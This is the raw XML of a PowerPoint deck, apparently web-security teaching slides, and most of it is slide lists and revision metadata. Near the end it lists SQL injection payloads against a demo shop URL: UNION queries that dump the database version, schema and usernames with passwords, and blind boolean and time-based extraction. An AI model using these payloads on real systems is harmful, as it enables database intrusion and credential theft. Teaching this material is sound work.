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35" r:id="rId3"/>
    <p:sldId id="426" r:id="rId4"/>
    <p:sldId id="339" r:id="rId5"/>
    <p:sldId id="340" r:id="rId6"/>
    <p:sldId id="341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50" r:id="rId17"/>
    <p:sldId id="451" r:id="rId18"/>
    <p:sldId id="447" r:id="rId19"/>
    <p:sldId id="448" r:id="rId20"/>
    <p:sldId id="449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37" r:id="rId37"/>
    <p:sldId id="436" r:id="rId38"/>
    <p:sldId id="435" r:id="rId39"/>
    <p:sldId id="343" r:id="rId40"/>
    <p:sldId id="374" r:id="rId41"/>
    <p:sldId id="434" r:id="rId42"/>
    <p:sldId id="428" r:id="rId43"/>
    <p:sldId id="467" r:id="rId44"/>
    <p:sldId id="468" r:id="rId45"/>
    <p:sldId id="469" r:id="rId46"/>
    <p:sldId id="375" r:id="rId47"/>
    <p:sldId id="376" r:id="rId48"/>
    <p:sldId id="377" r:id="rId49"/>
    <p:sldId id="472" r:id="rId50"/>
    <p:sldId id="471" r:id="rId51"/>
    <p:sldId id="470" r:id="rId52"/>
    <p:sldId id="429" r:id="rId53"/>
    <p:sldId id="378" r:id="rId54"/>
    <p:sldId id="380" r:id="rId55"/>
    <p:sldId id="381" r:id="rId56"/>
    <p:sldId id="382" r:id="rId57"/>
    <p:sldId id="384" r:id="rId58"/>
    <p:sldId id="475" r:id="rId59"/>
    <p:sldId id="474" r:id="rId60"/>
    <p:sldId id="387" r:id="rId61"/>
    <p:sldId id="473" r:id="rId62"/>
    <p:sldId id="430" r:id="rId63"/>
    <p:sldId id="389" r:id="rId64"/>
    <p:sldId id="388" r:id="rId65"/>
    <p:sldId id="391" r:id="rId66"/>
    <p:sldId id="392" r:id="rId67"/>
    <p:sldId id="393" r:id="rId68"/>
    <p:sldId id="479" r:id="rId69"/>
    <p:sldId id="478" r:id="rId70"/>
    <p:sldId id="394" r:id="rId71"/>
    <p:sldId id="411" r:id="rId72"/>
    <p:sldId id="477" r:id="rId73"/>
    <p:sldId id="476" r:id="rId74"/>
    <p:sldId id="431" r:id="rId75"/>
    <p:sldId id="397" r:id="rId76"/>
    <p:sldId id="398" r:id="rId77"/>
    <p:sldId id="399" r:id="rId78"/>
    <p:sldId id="400" r:id="rId79"/>
    <p:sldId id="433" r:id="rId80"/>
    <p:sldId id="483" r:id="rId81"/>
    <p:sldId id="482" r:id="rId82"/>
    <p:sldId id="481" r:id="rId83"/>
    <p:sldId id="480" r:id="rId84"/>
    <p:sldId id="432" r:id="rId85"/>
    <p:sldId id="402" r:id="rId86"/>
    <p:sldId id="338" r:id="rId8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B246F-1451-414E-B299-1D1B58A7381F}" v="17" dt="2022-03-18T21:29:1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87" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="189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194B246F-1451-414E-B299-1D1B58A7381F}"/>
    <pc:docChg chg="custSel modSld">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:29:10.187" v="10"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:26.876" v="3"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="621167348" sldId="428"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:26.876" v="3"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="621167348" sldId="42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194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:32.392" v="5"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3317277007" sldId="429"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:32.392" v="5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mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:59.546" v="6" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1365994828" sldId="430"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:59.546" v="6" actId="313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194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:29:10.187" v="10"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="53262624" sldId="432"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:29:10.187" v="10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194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:22.494" v="1"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4117409162" sldId="434"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:27:22.494" v="1"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4117409162" sldId="43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194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:29:04.653" v="8"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4196166211" sldId="480"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{194B246F-1451-414E-B299-1D1B58A7381F}" dt="2022-03-18T21:29:04.653" v="8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2-06T11:14:04.573" v="8083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4T07:36:28.349" v="7919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24T07:36:28.349" v="7919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2-06T11:13:38.880" v="8039" actId="20577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2-06T11:14:04.573" v="8083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56732ECD-ECFA-4D7D-A167-D02AB58E1D74}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T21:03:48.964" v="656" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T21:03:48.964" v="656" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1876729422" sldId="387"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T21:03:22.830" v="529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modSp">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T20:52:26.247" v="516" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1236122720" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T20:52:26.247" v="516" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1236122720" sldId="394"/>
            <ac:spMk id="3" creationId="{501072D5-C854-4286-BEAB-5433E54C5F4C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T20:41:25.199" v="449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56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T20:41:25.199" v="449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addSp delSp modSp mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:50:25.599" v="102" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1600761852" sldId="453"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:32:00.129" v="1" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="2" creationId="{AF2E6942-FEA9-4933-BA81-EBA8BE806F0A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:32:03.886" v="4" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="3" creationId="{6F68C340-4F3E-4BD8-9471-DB131BAD0296}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:50:25.599" v="102" actId="1035"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="5" creationId="{C621DE67-9694-4BF4-9E8A-F80C4E9DF500}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:49:59.960" v="85" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="7" creationId="{1285D9BD-8FE2-435F-8152-E999187A7F09}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:50:25.599" v="102" actId="1035"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="9" creationId="{AA6CCDB4-9C04-428C-9F34-97F0943C6AF0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4:35.321" v="23" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3866130153" sldId="454"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:26.808" v="18" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="2" creationId="{C3C7EACE-0752-456A-AC79-1D4810127009}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:27.336" v="19" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="3" creationId="{D3117732-4B2B-46C2-83D9-3D96B14D86DF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:35.321" v="23" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="5" creationId="{EFA4C95E-706F-4FCC-B60E-B30D0AE469DD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5:15.978" v="31" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3380740525" sldId="455"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:52.625" v="24" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3380740525" sldId="455"/>
            <ac:picMk id="2" creationId="{47664FA2-ECFB-4CFD-AD13-C31C9455B04B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:35:15.978" v="31" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3380740525" sldId="455"/>
            <ac:picMk id="4" creationId="{52B58ABE-E159-42A4-A8A7-7893AB395598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6:02.651" v="42" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3681501289" sldId="456"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:35:39.844" v="32" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681501289" sldId="456"/>
            <ac:picMk id="2" creationId="{E70C91B3-5219-4654-B24C-C90BE84B0FFE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:36:02.651" v="42" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681501289" sldId="456"/>
            <ac:picMk id="4" creationId="{E22088BE-0CD2-4B24-9C96-F426BB6B09C8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7:22.293" v="47" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3364176872" sldId="457"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:37:15.108" v="43" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3364176872" sldId="457"/>
            <ac:picMk id="2" creationId="{87EC6B61-2E3B-40EF-9C20-F1F26F68B28C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:37:22.293" v="47" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3364176872" sldId="457"/>
            <ac:picMk id="4" creationId="{71F7046D-0126-4F2C-BB72-5C0E0BA15316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8:16.086" v="52" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="838756640" sldId="458"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:08.604" v="48" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838756640" sldId="458"/>
            <ac:picMk id="2" creationId="{9C638A45-08AC-465D-A2D5-F17118F3175E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:16.086" v="52" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838756640" sldId="458"/>
            <ac:picMk id="4" creationId="{83F742E5-E71B-4789-A9AB-EBC62CB33716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38:51.163" v="59" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1096124257" sldId="459"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:40.377" v="53" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1096124257" sldId="459"/>
            <ac:picMk id="2" creationId="{81A81B13-5517-4721-9F1F-C2AD75ED1FF2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:51.163" v="59" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1096124257" sldId="459"/>
            <ac:picMk id="4" creationId="{A4084DAE-D571-4CF8-A090-C26F8D88A98E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23T19:25:20.719" v="108" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="781291766" sldId="460"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T19:25:20.719" v="108" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:spMk id="3" creationId="{262144AF-35BE-447C-8AC6-60CBF2A52549}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:40:27.564" v="60" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:picMk id="4" creationId="{ED53D162-3479-4162-A982-CD9BAEBB1556}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:40:37.932" v="66" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:picMk id="5" creationId="{415DC133-2C31-4FEA-912C-A13351EF86C5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1:07.511" v="71" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1929560910" sldId="461"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:01.792" v="67" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1929560910" sldId="461"/>
            <ac:picMk id="3" creationId="{D34F4EEE-76D3-41D8-8C4E-6ADD27DFA430}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:07.511" v="71" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1929560910" sldId="461"/>
            <ac:picMk id="4" creationId="{DD54D02B-EE42-4263-BD8A-4CACDA292399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1:48.823" v="76" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="973399520" sldId="462"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:41.057" v="72" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="973399520" sldId="462"/>
            <ac:picMk id="3" creationId="{624D7551-DA34-480B-A4F5-1E68AD55AB37}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:48.823" v="76" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="973399520" sldId="462"/>
            <ac:picMk id="4" creationId="{B85D2D3E-7F5C-45CA-8A83-BBC5C590A294}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:44:10.252" v="84" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3766473943" sldId="463"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:43:53.816" v="77" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766473943" sldId="463"/>
            <ac:picMk id="3" creationId="{1EC3401B-D06A-435E-ACD5-364D82349E24}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:44:10.252" v="84" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766473943" sldId="463"/>
            <ac:picMk id="4" creationId="{35A509A2-51A9-4E71-B083-E0383113A718}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T20:41:19.369" v="446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56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-23T20:41:19.369" v="446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1' and 1=2;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1; Select @@version;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1 UNION Select @@version;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1 UNION Select @@version, null, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select @@version, null, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select @@version, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, null, null from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, password, null, null from users;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://lightside.me/shop/blind.php?id=1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1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' or 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 or 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and 1=2;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 UNION Select @@version;--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1=1;-- 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and true = false;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = true;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,1) = 'm', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,1) = 'x', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,2) = 'ma', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 UNION SELECT IF(SUBSTRING(uname,1,1) = 'm', sleep(5), false) FROM users LIMIT 1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p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dbs</a:t>
